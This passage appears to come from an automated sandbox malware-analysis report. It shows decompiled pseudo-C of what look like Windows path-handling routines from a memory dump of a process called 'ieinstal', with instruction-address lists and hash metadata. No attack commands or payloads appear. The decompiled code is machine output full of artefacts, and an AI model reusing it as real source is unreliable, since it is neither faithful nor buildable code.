								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E1ED5D130(_t427, _t494, _t511);
				}
			}










































































                        0x1edd5ba5
                        0x1edd5baa
                        0x1edd5baf
                        0x1edd5bb4
                        0x1edd5bb6
                        0x1edd5bbc
                        0x1edd5bbe
                        0x1edd5bc4
                        0x1edd5bcd
                        0x1edd5bd3
                        0x1edd5bd6
                        0x1edd5bdc
                        0x1edd5be0
                        0x1edd5be3
                        0x1edd5beb
                        0x1edd5bf2
                        0x1edd5bf8
                        0x1edd5bfe
                        0x1edd5c04
                        0x1edd5c0e
                        0x1edd5c18
                        0x1edd5c1f
                        0x1edd5c25
                        0x1edd5c2a
                        0x1edd5c2c
                        0x1edd5c32
                        0x1edd5c3a
                        0x1edd5c3f
                        0x1edd5c42
                        0x1edd5c48
                        0x1edd5c5b
                        0x1edd5c5b
                        0x1edd5c2c
                        0x1edd5cb7
                        0x1edd5cb9
                        0x1edd5cbf
                        0x1edd5cc2
                        0x1edd5cca
                        0x1edd5ccb
                        0x1edd5ccb
                        0x1edd5cd1
                        0x1edd5cd7
                        0x1edd5cda
                        0x1edd5ce1
                        0x1edd5ce4
                        0x1edd5ce7
                        0x1edd5ced
                        0x1edd5cf3
                        0x1edd5cf9
                        0x1edd5cff
                        0x1edd5d08
                        0x1edd5d0a
                        0x1edd5d0e
                        0x1edd5d10
                        0x00000000
                        0x00000000
                        0x1edd5d16
                        0x1edd5d1a
                        0x00000000
                        0x00000000
                        0x1edd5d20
                        0x1edd5d22
                        0x1edd5d25
                        0x1edd5d2f
                        0x1edd5d2f
                        0x1edd5d33
                        0x1edd5d3d
                        0x1edd5d49
                        0x1edd5d4b
                        0x00000000
                        0x00000000
                        0x1edd5d5a
                        0x1edd5d5d
                        0x1edd5d60
                        0x00000000
                        0x00000000
                        0x1edd5d66
                        0x1edd5d69
                        0x00000000
                        0x00000000
                        0x1edd5d6f
                        0x1edd5d6f
                        0x1edd5d73
                        0x1edd5d79
                        0x1edd5d7f
                        0x1edd5d86
                        0x1edd5d95
                        0x1edd5d98
                        0x1edd5dba
                        0x1edd5dcb
                        0x1edd5dce
                        0x1edd5dd3
                        0x1edd5dd6
                        0x1edd5dd8
                        0x1edd5de6
                        0x1edd5dec
                        0x1edd5dee
                        0x1edd5df1
                        0x1edd5df3
                        0x1edd635a
                        0x1edd635a
                        0x00000000
                        0x1edd635a
                        0x1edd5dfe
                        0x1edd5e02
                        0x1edd5e05
                        0x1edd5e07
                        0x1edd5e10
                        0x1edd5e13
                        0x1edd5e1b
                        0x1edd5e1c
                        0x1edd5e21
                        0x1edd5e22
                        0x1edd5e23
                        0x1edd5e25
                        0x1edd5e2a
                        0x1edd5e2c
                        0x1edd5e2e
                        0x1edd5e36
                        0x1edd5e39
                        0x1edd5e42
                        0x1edd5e47
                        0x1edd5e4d
                        0x1edd5e54
                        0x1edd5e54
                        0x1edd5e54
                        0x1edd5e2e
                        0x1edd5e5c
                        0x1edd5e5f
                        0x1edd5e62
                        0x1edd5e64
                        0x1edd5e6b
                        0x1edd5e70
                        0x1edd5e7a
                        0x1edd5e7a
                        0x1edd5e7a
                        0x1edd5e6b
                        0x1edd5e7e
                        0x1edd5e7f
                        0x1edd5e7f
                        0x1edd5e81
                        0x1edd5e87
                        0x1edd5e8b
                        0x1edd5e8c
                        0x1edd5e8c
                        0x1edd5e8c
                        0x1edd5e9a
                        0x1edd5e9c
                        0x1edd5ea2
                        0x1edd5ea6
                        0x1edd5f50
                        0x1edd5f50
                        0x1edd5f57
                        0x1edd5f66
                        0x1edd5f66
                        0x1edd5f66
                        0x1edd5f68
                        0x1edd5f6a
                        0x1edd63d0
                        0x00000000
                        0x1edd5f70
                        0x1edd5f70
                        0x1edd5f91
                        0x1edd5f9c
                        0x1edd5f9e
                        0x1edd5fa4
                        0x1edd5fa6
                        0x1edd638c
                        0x1edd6392
                        0x1edd63a1
                        0x1edd63a7
                        0x1edd63af
                        0x1edd63af
                        0x1edd63bd
                        0x1edd63d8
                        0x00000000
                        0x1edd63d8
                        0x1edd5fac
                        0x1edd5fb2
                        0x1edd5fb4
                        0x1edd5fbd
                        0x1edd5fc6
                        0x1edd5fce
                        0x1edd5fd4
                        0x1edd5fdc
                        0x1edd5fec
                        0x1edd5fed
                        0x1edd5fee
                        0x1edd5fef
                        0x1edd5ff9
                        0x1edd5ffa
                        0x1edd5ffb
                        0x1edd5ffc
                        0x1edd6000
                        0x1edd6004
                        0x1edd6012
                        0x1edd6012
                        0x1edd6018
                        0x1edd6019
                        0x1edd601a
                        0x1edd601b
                        0x1edd601c
                        0x1edd6020
                        0x1edd6059
                        0x1edd605c
                        0x1edd6061
                        0x1edd6061
                        0x1edd6022
                        0x1edd6022
                        0x1edd6022
                        0x1edd6025
                        0x1edd602a
                        0x1edd602b
                        0x1edd6031
                        0x1edd6037
                        0x1edd6038
                        0x1edd603e
                        0x1edd6048
                        0x1edd6049
                        0x1edd604a
                        0x1edd604b
                        0x1edd604c
                        0x1edd604d
                        0x1edd6053
                        0x1edd6054
                        0x1edd6054
                        0x1edd6062
                        0x1edd6065
                        0x1edd6067
                        0x1edd606a
                        0x1edd6070
                        0x1edd6075
                        0x1edd6076
                        0x1edd6081
                        0x1edd6087
                        0x1edd6095
                        0x1edd6099
                        0x1edd609e
                        0x1edd60a4
                        0x1edd60ae
                        0x1edd60b0
                        0x1edd60b3
                        0x1edd60b6
                        0x1edd60b8
                        0x1edd60ba
                        0x1edd60ba
                        0x1edd60ba
                        0x1edd60ba
                        0x1edd60be
                        0x1edd60c0
                        0x1edd60c5
                        0x1edd60c5
                        0x1edd60c5
                        0x1edd60c6
                        0x1edd60cd
                        0x1edd6114
                        0x1edd60cf
                        0x1edd60cf
                        0x1edd60d4
                        0x1edd60d5
                        0x1edd60da
                        0x1edd60db
                        0x1edd60e1
                        0x1edd60e2
                        0x1edd60e8
                        0x1edd60f8
                        0x1edd60fd
                        0x1edd60fe
                        0x1edd6102
                        0x1edd6104
                        0x1edd6107
                        0x1edd6109
                        0x1edd610b
                        0x1edd610b
                        0x1edd610b
                        0x1edd610b
                        0x1edd610f
                        0x1edd610f
                        0x1edd6117
                        0x1edd611a
                        0x1edd611f
                        0x1edd6125
                        0x1edd6134
                        0x1edd6139
                        0x1edd613f
                        0x1edd6146
                        0x1edd6148
                        0x1edd614b
                        0x1edd614d
                        0x1edd614f
                        0x1edd614f
                        0x1edd614f
                        0x1edd614f
                        0x1edd6153
                        0x1edd6159
                        0x1edd6159
                        0x1edd615c
                        0x1edd6163
                        0x1edd6169
                        0x1edd616c
                        0x1edd6172
                        0x1edd6181
                        0x1edd6186
                        0x1edd6187
                        0x1edd618b
                        0x1edd6191
                        0x1edd6195
                        0x1edd61a3
                        0x1edd61bb
                        0x1edd61c0
                        0x1edd61c3
                        0x1edd61cc
                        0x1edd61d0
                        0x1edd61dc
                        0x1edd61de
                        0x1edd61e1
                        0x1edd61e4
                        0x1edd61e6
                        0x1edd61e8
                        0x1edd61e8
                        0x1edd61e8
                        0x1edd61e8
                        0x1edd61e6
                        0x1edd61ec
                        0x1edd61f3
                        0x1edd6203
                        0x1edd6209
                        0x1edd620a
                        0x1edd6216
                        0x1edd621d
                        0x1edd6227
                        0x1edd6241
                        0x1edd6246
                        0x1edd624c
                        0x1edd6257
                        0x1edd6259
                        0x1edd625c
                        0x1edd625e
                        0x1edd6260
                        0x1edd6260
                        0x1edd6260
                        0x1edd6260
                        0x1edd625e
                        0x1edd6264
                        0x1edd6267
                        0x1edd6269
                        0x1edd6315
                        0x1edd6315
                        0x1edd631b
                        0x1edd631e
                        0x1edd6324
                        0x1edd6327
                        0x1edd632f
                        0x1edd6330
                        0x1edd6333
                        0x1edd633a
                        0x1edd633c
                        0x1edd6335
                        0x1edd6335
                        0x1edd6335
                        0x1edd633f
                        0x1edd6342
                        0x1edd634c
                        0x1edd6352
                        0x1edd6355
                        0x1edd6355
                        0x1edd6359
                        0x00000000
                        0x1edd626f
                        0x1edd6275
                        0x1edd6275
                        0x1edd6278
                        0x1edd627e
                        0x1edd627e
                        0x1edd6281
                        0x1edd6287
                        0x1edd628d
                        0x1edd6298
                        0x1edd629c
                        0x1edd62a2
                        0x1edd629e
                        0x1edd629e
                        0x1edd629e
                        0x1edd62a7
                        0x1edd62a7
                        0x1edd62aa
                        0x1edd62b0
                        0x1edd62f0
                        0x1edd62f0
                        0x1edd62f2
                        0x1edd62f8
                        0x1edd62fd
                        0x1edd62b2
                        0x1edd62b2
                        0x1edd62b2
                        0x1edd62b5
                        0x1edd62dd
                        0x1edd62e2
                        0x1edd62e5
                        0x1edd62b7
                        0x1edd62b8
                        0x1edd62bb
                        0x1edd62bd
                        0x1edd62c0
                        0x1edd62c4
                        0x1edd62cd
                        0x1edd62cd
                        0x1edd62c0
                        0x1edd62bb
                        0x1edd62b5
                        0x1edd6302
                        0x1edd6303
                        0x1edd6305
                        0x1edd6305
                        0x1edd6305
                        0x1edd630c
                        0x1edd630c
                        0x00000000
                        0x1edd627e
                        0x1edd6269
                        0x1edd5eac
                        0x1edd5ebb
                        0x1edd5ebe
                        0x1edd5ecb
                        0x1edd5ecb
                        0x1edd5ece
                        0x1edd5ece
                        0x1edd5ed4
                        0x1edd5ed7
                        0x1edd5ed9
                        0x1edd5edb
                        0x1edd5edb
                        0x1edd5ee1
                        0x1edd5ee1
                        0x1edd5ee3
                        0x1edd5f20
                        0x1edd5f20
                        0x1edd5ee5
                        0x1edd5ee5
                        0x1edd5ee5
                        0x1edd5ee8
                        0x1edd5f11
                        0x1edd5f18
                        0x1edd5eea
                        0x1edd5eea
                        0x1edd5eed
                        0x1edd5ef2
                        0x1edd5ef8
                        0x1edd5efb
                        0x1edd5f0a
                        0x1edd5f0a
                        0x1edd5eed
                        0x1edd5ee8
                        0x1edd5f22
                        0x1edd5f28
                        0x00000000
                        0x00000000
                        0x1edd5f30
                        0x1edd5f31
                        0x1edd5f37
                        0x1edd5f3a
                        0x1edd5f3d
                        0x1edd5f44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd5f46
                        0x1edd5f48
                        0x1edd5f4d
                        0x00000000
                        0x1edd5f4d
                        0x1edd5dda
                        0x1edd5ddf
                        0x00000000
                        0x1edd5ddf
                        0x1edd5dd8
                        0x1edd5da7
                        0x1edd5da9
                        0x1edd5dac
                        0x1edd5dae
                        0x00000000
                        0x1edd5db4
                        0x1edd5db4
                        0x00000000
                        0x1edd5db4
                        0x1edd5dae
                        0x1edd5d88
                        0x1edd5d8d
                        0x1edd6363
                        0x1edd6369
                        0x1edd636a
                        0x1edd6370
                        0x1edd6372
                        0x1edd637a
                        0x1edd637b
                        0x1edd637d
                        0x00000000
                        0x00000000
                        0x1edd637f
                        0x1edd6385
                        0x00000000
                        0x1edd6385
                        0x1edd5d38
                        0x1edd5d3b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd5d3b
                        0x1edd5d27
                        0x1edd5d29
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd6360
                        0x00000000
                        0x1edd6360
                        0x1edd5c10
                        0x1edd5c10
                        0x1edd63da
                        0x1edd63e5
                        0x1edd63e5

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c5e15708d761917290b24ec074f9c225d6d93690687b5fdcabc71dd8ae03206c
                        • Instruction ID: 343b471e36c3fba6416318b61f32ff35602a1bf8adbe33b136dc608e0691eb7e
                        • Opcode Fuzzy Hash: c5e15708d761917290b24ec074f9c225d6d93690687b5fdcabc71dd8ae03206c
                        • Instruction Fuzzy Hash: 66425B75D10369CFDB20CF68C890BA9B7B1FF45304F1582AAD95DAB281D734A989CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED24120, Relevance: .4, Instructions: 444COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E1ED24120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1edfd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1ED3F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1ED26E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1ED24620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1ED26E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1ED245F8))) {
												case 0:
													_v568 = 0x1ece1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1ece11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1ED24620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1ED4F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1ED4F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1ED052A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1ED1EB70(1, 0x1edf79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1ED1AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1ED495D0();
																			L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E1ED4B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1ED43D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1ED4B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                        0x1ed24128
                        0x1ed24135
                        0x1ed2413c
                        0x1ed24141
                        0x1ed24145
                        0x1ed24147
                        0x1ed2414e
                        0x1ed24151
                        0x1ed24159
                        0x1ed2415c
                        0x1ed24160
                        0x1ed24164
                        0x1ed24168
                        0x1ed2416c
                        0x1ed2417f
                        0x1ed24181
                        0x1ed2446a
                        0x1ed2446a
                        0x1ed2418c
                        0x1ed24195
                        0x1ed24199
                        0x1ed24432
                        0x1ed24439
                        0x1ed2443d
                        0x1ed24442
                        0x1ed24447
                        0x00000000
                        0x1ed2419f
                        0x1ed241a3
                        0x1ed241b1
                        0x1ed241b9
                        0x1ed241bd
                        0x1ed245db
                        0x1ed245db
                        0x00000000
                        0x1ed241c3
                        0x1ed241c3
                        0x1ed241ce
                        0x1ed241d4
                        0x1ed6e138
                        0x1ed6e13e
                        0x1ed6e169
                        0x1ed6e16d
                        0x1ed6e19e
                        0x1ed6e16f
                        0x1ed6e16f
                        0x1ed6e175
                        0x1ed6e179
                        0x1ed6e18f
                        0x1ed6e193
                        0x00000000
                        0x1ed6e199
                        0x00000000
                        0x1ed6e199
                        0x1ed6e193
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed241da
                        0x1ed241da
                        0x1ed241df
                        0x1ed241e4
                        0x1ed241ec
                        0x1ed24203
                        0x1ed24207
                        0x1ed6e1fd
                        0x1ed24222
                        0x1ed24226
                        0x1ed6e1f3
                        0x1ed6e1f3
                        0x1ed2422c
                        0x1ed2422c
                        0x1ed24233
                        0x1ed6e1ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed24239
                        0x1ed24239
                        0x1ed24239
                        0x1ed24239
                        0x1ed24233
                        0x1ed24226
                        0x1ed241ee
                        0x1ed241ee
                        0x1ed241f4
                        0x1ed24575
                        0x1ed6e1b1
                        0x1ed6e1b1
                        0x00000000
                        0x1ed2457b
                        0x1ed2457b
                        0x1ed24582
                        0x1ed6e1ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed24588
                        0x1ed24588
                        0x1ed2458c
                        0x1ed6e1c4
                        0x1ed6e1c4
                        0x00000000
                        0x1ed24592
                        0x1ed24592
                        0x1ed24599
                        0x1ed6e1be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed2459f
                        0x1ed2459f
                        0x1ed245a3
                        0x1ed6e1d7
                        0x1ed6e1e4
                        0x00000000
                        0x1ed245a9
                        0x1ed245a9
                        0x1ed245b0
                        0x1ed6e1d1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed245b6
                        0x1ed245b6
                        0x1ed245b6
                        0x00000000
                        0x1ed245b6
                        0x1ed245b0
                        0x1ed245a3
                        0x1ed24599
                        0x1ed2458c
                        0x1ed24582
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed241f4
                        0x1ed2423e
                        0x1ed24241
                        0x1ed245c0
                        0x1ed245c4
                        0x00000000
                        0x1ed245ca
                        0x1ed245ca
                        0x00000000
                        0x1ed6e207
                        0x1ed6e20f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed245d1
                        0x00000000
                        0x00000000
                        0x1ed245ca
                        0x00000000
                        0x1ed24247
                        0x1ed24247
                        0x1ed24247
                        0x1ed24249
                        0x1ed24249
                        0x1ed24249
                        0x1ed24251
                        0x1ed24251
                        0x1ed24257
                        0x1ed2425f
                        0x1ed2426e
                        0x1ed24270
                        0x1ed2427a
                        0x1ed6e219
                        0x1ed6e219
                        0x1ed24280
                        0x1ed24282
                        0x1ed24456
                        0x1ed245ea
                        0x00000000
                        0x1ed245f0
                        0x1ed6e223
                        0x00000000
                        0x1ed6e223
                        0x1ed2445c
                        0x1ed2445c
                        0x00000000
                        0x1ed2445c
                        0x00000000
                        0x1ed24288
                        0x1ed2428c
                        0x1ed6e298
                        0x1ed24292
                        0x1ed24292
                        0x1ed2429e
                        0x1ed242a3
                        0x1ed242a7
                        0x1ed242ac
                        0x1ed6e22d
                        0x1ed242b2
                        0x1ed242b2
                        0x1ed242b9
                        0x1ed242bc
                        0x1ed242c2
                        0x1ed242ca
                        0x1ed242cd
                        0x1ed242cd
                        0x1ed242d4
                        0x1ed2433f
                        0x1ed2433f
                        0x1ed242d6
                        0x1ed242d6
                        0x1ed242d9
                        0x1ed242dd
                        0x1ed242eb
                        0x1ed6e23a
                        0x1ed242f1
                        0x1ed24305
                        0x1ed2430d
                        0x1ed24315
                        0x1ed24318
                        0x1ed2431f
                        0x1ed24322
                        0x1ed2432e
                        0x1ed2433b
                        0x1ed2433b
                        0x00000000
                        0x1ed2432e
                        0x1ed242eb
                        0x1ed2434c
                        0x1ed2434e
                        0x1ed24352
                        0x1ed24359
                        0x1ed2435e
                        0x1ed24361
                        0x1ed2436e
                        0x1ed2438a
                        0x1ed2438e
                        0x1ed24396
                        0x1ed2439e
                        0x1ed243a1
                        0x1ed243ad
                        0x1ed243bb
                        0x1ed243bb
                        0x1ed243ad
                        0x1ed2436e
                        0x1ed243bf
                        0x1ed243c5
                        0x1ed24463
                        0x1ed24463
                        0x1ed243ce
                        0x1ed243d5
                        0x1ed243d9
                        0x1ed243df
                        0x1ed24475
                        0x1ed24479
                        0x1ed24491
                        0x1ed24491
                        0x1ed24479
                        0x1ed243e5
                        0x1ed243eb
                        0x1ed243f4
                        0x1ed243f6
                        0x1ed243f9
                        0x1ed243fc
                        0x1ed243ff
                        0x1ed244e8
                        0x1ed244ed
                        0x1ed244f3
                        0x1ed6e247
                        0x00000000
                        0x1ed244f9
                        0x1ed24504
                        0x1ed24508
                        0x1ed2450f
                        0x1ed6e269
                        0x00000000
                        0x1ed24515
                        0x1ed24519
                        0x1ed24531
                        0x1ed24534
                        0x1ed24537
                        0x1ed2453e
                        0x1ed24541
                        0x1ed2454a
                        0x1ed6e255
                        0x1ed6e255
                        0x1ed6e25b
                        0x1ed6e25e
                        0x1ed6e261
                        0x1ed6e261
